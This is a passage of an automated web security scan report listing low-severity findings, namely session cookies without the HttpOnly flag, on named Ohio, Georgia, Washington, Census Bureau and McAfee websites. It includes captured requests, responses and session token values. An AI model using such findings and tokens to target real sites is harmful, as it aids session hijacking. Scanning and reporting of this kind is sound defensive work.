GET /SearchCriteria.asp HTTP/1.1
Host: elicense4-lookup.com.ohio.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Sat, 30 Apr 2011 12:20:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: default.asp
Content-Length: 132
Content-Type: text/html
Expires: Sat, 30 Apr 2011 12:20:16 GMT
Set-Cookie: ASPSESSIONIDCSDSADTR=HPBNDPPBEDIACMMFNMIOHCDN; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="default.asp">here</a>.</body>

14.26. http://factfinder.census.gov/servlet/EconSectorServlet  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://factfinder.census.gov
Path:   /servlet/EconSectorServlet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /servlet/EconSectorServlet HTTP/1.1
Host: factfinder.census.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:20:31 GMT
Server: IBM_HTTP_Server
Content-Length: 6584
Set-Cookie: JSESSIONID=0001t-s2pDArfsfFpFtToeGGq3c:134a7lirl; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<form name='gotoMainPageForm' method='get' style="display:inline" action="">
<input type='hidden' name='_la
...[SNIP]...

14.27. https://fin.oaks.ohio.gov/psp/FNPRD/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://fin.oaks.ohio.gov
Path:   /psp/FNPRD/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /psp/FNPRD/ HTTP/1.1
Host: fin.oaks.ohio.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: fin.oaks.ohio.gov=R1934382832; path=/
Date: Sat, 30 Apr 2011 12:20:09 GMT
Content-Length: 12902
Content-Type: text/html; CHARSET=utf-8
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: FNPRD-PORTAL-PSJSESSIONID=8SKyN72hGDFKBkl1QC8vYfpb7c1J2114!-669996233; domain=.oaks.ohio.gov; path=/
Cache-Control: no-store
RespondingWithSignonPage: true
Connection: close

<!--* ******************************************************************
* Confidentiality Information:
*
* This module is the confidential and proprietary information of
* PeopleSoft, Inc.;
...[SNIP]...

14.28. https://fortress.wa.gov/dol/dolprod/dsdoffices/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://fortress.wa.gov
Path:   /dol/dolprod/dsdoffices/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dol/dolprod/dsdoffices/ HTTP/1.1
Host: fortress.wa.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
connection: close
content-type: text/html; charset=utf-8
date: Sat, 30 Apr 2011 12:20:40 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: Microsoft-IIS/6.0
x-old-content-length: 26606
cache-control: private
x-powered-by: ASP.NET
x-aspnet-version: 2.0.50727
Set-Cookie: AMWEBJCT!%2Fdol%2Fdolprod!ASP.NET_SessionId=jicq3e45qrkfam55gph5la45; Path=/
Set-Cookie: PD_STATEFUL_101c5ca4-0734-11dc-b4ac-000255ef2051=%2Fdol%2Fdolprod; Path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1">
...[SNIP]...

14.29. http://ga.gov/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ga.gov
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: ga.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sat, 30 Apr 2011 00:14:32 GMT
Server: Apache/1.3.29 (Unix)
Location: /00/home/0,2061,4802,00.html;jsessionid=E163D8F13AEF17647444D0A429B79A87
Set-cookie: JSESSIONID=E163D8F13AEF17647444D0A429B79A87;Path=/
Set-Cookie: vgnvisitor=2w45tg00s3c00001jrJkq8F01b; path=/; expires=Saturday, 06-Sep-2014 23:50:08 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 8



14.30. http://ga.gov/gta/GTASearch  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ga.gov
Path:   /gta/GTASearch

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gta/GTASearch HTTP/1.1
Host: ga.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_invisit=true; s_cc=true; JSESSIONID=B90454543E677169DC2E75E0E1107A42; s_sq=georgiagovprod%3D%2526pid%253DGeorgiaGov%252520-%252520Mobile%252520Home%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//ga.gov/00/channel_title/0%25252C2094%25252C4802_5035%25252C00.html%2526ot%253DA; s_nr=1304125322638; vgnvisitor=2w45tg00s3c00001jrJkq8F01b; s_vnum=1306715774545%26vn%3D1;

Response

HTTP/1.1 302 Found
Date: Sat, 30 Apr 2011 11:52:13 GMT
Server: Apache/1.3.29 (Unix)
Location: http://search1.georgia.gov/search?null
Set-cookie: JSESSIONID=3B90326DCBFA49AFC7F4FBD1B69828AF;Path=/
Connection: close
Content-Type: text/html
Content-Length: 1086

<html><head>
<title>
Sun ONE Application Server - HTTP Status 302 Error
</title>
<STYLE><!--
BODY{font-family : verdana, geneva, helvetica, arial, sans-serif; color : black;background-color : white;}

...[SNIP]...

14.31. http://ga.gov/mobile  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ga.gov
Path:   /mobile

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mobile HTTP/1.1
Host: ga.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=E163D8F13AEF17647444D0A429B79A87; vgnvisitor=2w45tg00s3c00001jrJkq8F01b; s_vnum=1306715774545%26vn%3D1; s_cc=true; s_nr=1304123795484; s_invisit=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 302 Found
Date: Sat, 30 Apr 2011 00:28:52 GMT
Server: Apache/1.3.29 (Unix)
Location: /00/mobile/0,2783,4802,00.html
Set-cookie: JSESSIONID=B90454543E677169DC2E75E0E1107A42;Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 8



14.32. http://georgiawildlife.dnr.state.ga.us/content/displaynavigation.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://georgiawildlife.dnr.state.ga.us
Path:   /content/displaynavigation.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/displaynavigation.asp HTTP/1.1
Host: georgiawildlife.dnr.state.ga.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDCCRQTQAT=JJGJOMPANKAFPMLCIIKOKEKL;

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Sat, 30 Apr 2011 12:20:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://www.georgiawildlife.com
Content-Length: 151
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCCCBDBRT=ENHLBBNBMOPCLMHIEGNGFKHG; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://www.georgiawildlife.com">here</a>.</body>

14.33. http://georgiawildlife.dnr.state.ga.us/content/displaynavigation.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://georgiawildlife.dnr.state.ga.us
Path:   /content/displaynavigation.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/displaynavigation.asp?TopCategory=12 HTTP/1.1
Host: georgiawildlife.dnr.state.ga.us
Proxy-Connection: keep-alive
Referer: http://www.georgia.gov/external/?url=http://georgiawildlife.dnr.state.ga.us/content/displaynavigation.asp?TopCategory=12
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Object moved
Date: Sat, 30 Apr 2011 00:59:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://www.georgiawildlife.com
Content-Length: 151
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCCRQTQAT=KJGJOMPAMFOPGFPGLKBJHMCE; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://www.georgiawildlife.com">here</a>.</body>

14.34. https://georgiawildlife.dnr.state.ga.us/service/login1.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://georgiawildlife.dnr.state.ga.us
Path:   /service/login1.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /service/login1.asp HTTP/1.1
Host: georgiawildlife.dnr.state.ga.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDCCRQTQAT=JJGJOMPANKAFPMLCIIKOKEKL;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:20:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 28917
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCCCBDBRT=MNHLBBNBFOPGOOKAIIBNMDLG; path=/
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1" runat="serve
...[SNIP]...

14.35. https://hcm.oaks.ohio.gov/psp/HCPRD/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://hcm.oaks.ohio.gov
Path:   /psp/HCPRD/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /psp/HCPRD/ HTTP/1.1
Host: hcm.oaks.ohio.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: hcm.oaks.ohio.gov=R2338435115; path=/
Date: Sat, 30 Apr 2011 12:20:31 GMT
Content-Length: 14341
Content-Type: text/html; CHARSET=utf-8
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: HCPRD-PORTAL-PSJSESSIONID=l6sLN72PQQ42bBRK22SfpKLTH5zqJJvN!-609733431; domain=.oaks.ohio.gov; path=/
Cache-Control: no-store
RespondingWithSignonPage: true
Connection: close

<!--* ******************************************************************
* Confidentiality Information:
*
* This module is the confidential and proprietary information of
* PeopleSoft, Inc.;
...[SNIP]...

14.36. http://home.mcafee.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://home.mcafee.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: home.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27mcafee%27%2C%271304109967310%27%5D%5D; lBounceURL=http://home.mcafee.com/secure/cart/; langid=1; HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; AffID=0-0; CookieInformation=locale=us; s_sq=%5B%5BB%5D%5D; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=86873; s_campaign=78228; CampaignId=86873; s_cc=true; HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; IscartemptySiteidAffid=no-1-0; s_nr=1304109967309-New; s_vi=[CS]v1|26DD91D7051D181F-60000106600003DE[CE]; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: SiteID=1; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:55 GMT; path=/; HttpOnly
Set-Cookie: langid=1; domain=mcafee.com; expires=Mon, 29-Apr-2041 21:18:55 GMT; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Locale=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:55 GMT; path=/; HttpOnly
Set-Cookie: HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:55 GMT; path=/; HttpOnly
Set-Cookie: AffID=0-0; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Currency=56; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: HRntm=aff=0-0&cur=56&piacct=l5hppVF9ZAZqvcqlqqTxbw%3d%3d&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: IscartemptySiteidAffid=no-1-0; domain=mcafee.com; path=/
X-Powered-By: ASP.NET
MS: SJV9
X-UA-Compatible: IE=8
Date: Fri, 29 Apr 2011 21:18:54 GMT
Content-Length: 36523
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmldom" xmlns="http://www.w3.org/1999/xhtml" dir="ltr"
...[SNIP]...

14.37. http://home.mcafee.com/AdviceCenter/Default.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://home.mcafee.com
Path:   /AdviceCenter/Default.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /AdviceCenter/Default.aspx HTTP/1.1
Host: home.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27mcafee%27%2C%271304109967310%27%5D%5D; lBounceURL=http://home.mcafee.com/secure/cart/; langid=1; HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; AffID=0-0; CookieInformation=locale=us; s_sq=%5B%5BB%5D%5D; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=86873; s_campaign=78228; CampaignId=86873; s_cc=true; HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; IscartemptySiteidAffid=no-1-0; s_nr=1304109967309-New; s_vi=[CS]v1|26DD91D7051D181F-60000106600003DE[CE]; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: SiteID=1; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:19:00 GMT; path=/; HttpOnly
Set-Cookie: langid=1; domain=mcafee.com; expires=Mon, 29-Apr-2041 21:19:00 GMT; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: lBounceURL=http://home.mcafee.com/AdviceCenter/Default.aspx; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Locale=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:19:00 GMT; path=/; HttpOnly
Set-Cookie: HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:19:00 GMT; path=/; HttpOnly
Set-Cookie: AffID=0-0; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Currency=56; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fAdviceCenter%2fDefault.aspx&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: IscartemptySiteidAffid=no-1-0; domain=mcafee.com; path=/
X-Powered-By: ASP.NET
MS: SJV2
X-UA-Compatible: IE=8
Date: Fri, 29 Apr 2011 21:19:00 GMT
Content-Length: 92200
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmldom" xmlns="http://www.w3.org/1999/xhtml" dir="ltr"
...[SNIP]...

14.38. http://home.mcafee.com/Default.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://home.mcafee.com
Path:   /Default.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Default.aspx?culture=ES-AR HTTP/1.1
Host: home.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27mcafee%27%2C%271304109967310%27%5D%5D; lBounceURL=http://home.mcafee.com/secure/cart/; langid=1; HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; AffID=0-0; CookieInformation=locale=us; s_sq=%5B%5BB%5D%5D; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=86873; s_campaign=78228; CampaignId=86873; s_cc=true; HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; IscartemptySiteidAffid=no-1-0; s_nr=1304109967309-New; s_vi=[CS]v1|26DD91D7051D181F-60000106600003DE[CE]; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: s_vi=; path=/
Set-Cookie: s_nr=; path=/
Set-Cookie: s_cc=; path=/
Set-Cookie: CampaignId=; path=/
Set-Cookie: s_campaign=; path=/
Set-Cookie: SessionInfo=; path=/
Set-Cookie: s_sq=; path=/
Set-Cookie: CookieInformation=; path=/
Set-Cookie: lBounceURL=; path=/
Set-Cookie: s_ev8=; path=/
Set-Cookie: session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a%3c%2fSessionData%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: SiteID=; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: lng=; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: langid=96; domain=mcafee.com; expires=Mon, 29-Apr-2041 21:18:55 GMT; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Locale=ES-AR; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:55 GMT; path=/; HttpOnly
Set-Cookie: HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=ES-AR; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:55 GMT; path=/; HttpOnly
Set-Cookie: AffID=0-0; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Currency=62; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: HRntm=aff=0-0&cur=62&piacct=l5hppVF9ZAZqvcqlqqTxbw%3d%3d&cid=86873&ct=1&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: IscartemptySiteidAffid=no-1-0; domain=mcafee.com; path=/
X-Powered-By: ASP.NET
MS: SJV2
X-UA-Compatible: IE=8
Date: Fri, 29 Apr 2011 21:18:55 GMT
Content-Length: 34453
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmldom" xmlns="http://www.w3.org/1999/xhtml" dir="ltr"
...[SNIP]...

